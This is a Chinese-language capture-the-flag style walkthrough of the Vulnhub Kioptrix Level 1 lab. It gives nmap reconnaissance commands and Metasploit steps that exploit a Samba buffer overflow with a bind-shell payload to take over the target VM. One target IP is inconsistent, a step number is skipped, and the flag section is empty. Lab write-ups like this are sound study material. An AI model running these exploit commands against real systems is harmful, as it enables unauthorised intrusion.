Vulnhub-靶机-Kioptrix: Level 1 (#1)

Vulnhub—靶机—Kioptrix: Level 1 (#1)

本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

文章目录

  • Vulnhub—靶机—Kioptrix: Level 1 (#1)
  • 一、信息收集
  • 二、漏洞利用
  • 三、Flag

一、信息收集

【步骤一】使用nmap确定目标靶机地址:
【命令】nmap -sP 192.168.43.0/24
Vulnhub-靶机-Kioptrix: Level 1 (#1)_第1张图片

【步骤二】对目标靶机进行全端口扫描:
【命令】nmap -n -sC -sV -p- 192.168.43.159
Vulnhub-靶机-Kioptrix: Level 1 (#1)_第2张图片

【步骤三】在139端口上运行着samba,使用msf模块进行samba版号查询
【命令】
msfconsole
search smb_version
use 0
set rhosts 192.168.1.104
set threads 50
run
Vulnhub-靶机-Kioptrix: Level 1 (#1)_第3张图片

二、漏洞利用

【步骤五】根据samba版本在网上查询发现有一个缓冲区溢出漏洞,在msf查找
Vulnhub-靶机-Kioptrix: Level 1 (#1)_第4张图片

【步骤六】使用11模块,设置payload为linux的shell
【命令】
use 11
set rhost 192.168.43.159
set payload linux/x86/shell_bind_tcp
run
Vulnhub-靶机-Kioptrix: Level 1 (#1)_第5张图片

三、Flag

【flag】

你可能感兴趣的:(Vulnhub-靶机,靶机,网络安全,渗透测试,安全)